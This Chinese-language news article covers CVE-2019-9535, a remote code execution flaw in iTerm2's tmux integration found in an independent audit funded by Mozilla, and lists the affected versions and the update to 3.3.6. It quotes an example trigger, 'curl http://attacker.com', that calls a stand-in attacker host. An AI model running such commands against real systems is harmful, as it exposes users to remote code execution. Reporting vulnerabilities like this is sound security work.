近日,由 Mozilla
开源支持计划 (MOSS) 资助、网络安全公司 Radically Open Security (ROS)
开展的一次独立安全审计结果显示,iTerm 2
中存在一个严重的远程代码执行 (RCE) 漏洞,且至少已存在 7 年。
iTerm 2 简介
iTerm 2
是非常流行的 MacOS 平台下的终端工具,被许多开发者与系统管理员广泛使用。iTerm 2
是 MacOS 内置终端工具最有力的热门开源工具替代品之一,被很多开发人员称为 MacOS 的终端利器。
iTerm 2 漏洞概述
据了解,ROS 发现 iTerm 2
中的 Tmux
集成功能有严重的安全漏洞,该漏洞目前分配到的编号为 CVE-2019-9535
。
Tumx 应用程序是一款终端多路复用器,可允许从单个设备创建并控制多个终端。
简单来说,在大多数情况下,攻击者可以利用这个漏洞在使用者电脑上远程执行命令。这个漏洞需要与用户进行一定程度的互动,然后攻击者才能进行后续的攻击行动。
但是由于攻击者可以通过一些被认为是安全的命令利用,例如:curl http://attacker.com
或者 tail -f /var/log/apache2/referer_log
,因此被认为有高度的潜在安全影响。
ROS 提供了攻击的 Demo 视频,该视频模拟受害者机器连接到恶意 SSH
服务器之后,在机器上执行命令的 PoC
。
iTerm 2 漏洞影响的版本
该漏洞将影响 iTerm 2 3.3.5
版本及之前所有版本,可能影响的 iTerm 2
用户数量介于 10 万至 20 万之间。
iTerm 2 漏洞修复方案
现在 Mozilla
、ROS
与 iTerm 2
开发者密切合作,推出了最新 3.3.6 版本,而 3.3.5 的安全修补程序也已经发布。
Mozilla 表示,虽然 iTerm 2
软件会主动提示更新,但是希望开发者能主动更新到 3.3.6 或 3.3.7 beta1,减少可能被攻击的机会。
参考文档
- https://www.google.com
- https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/
- https://www.theregister.co.uk/2019/10/10/iterm2_flaw_moss/
你可能还喜欢
点击下方图片即可阅读
Teamviewer 曝重大安全漏洞,攻击者可任意控制用户或属乌龙事件!(内附安全处理建议)